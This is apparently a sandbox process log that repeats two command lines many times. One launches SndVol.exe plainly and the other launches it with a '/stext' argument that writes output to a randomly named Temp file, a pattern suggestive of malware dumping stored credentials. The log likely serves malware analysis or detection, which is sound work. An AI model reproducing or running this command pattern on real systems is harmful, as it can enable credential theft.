C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
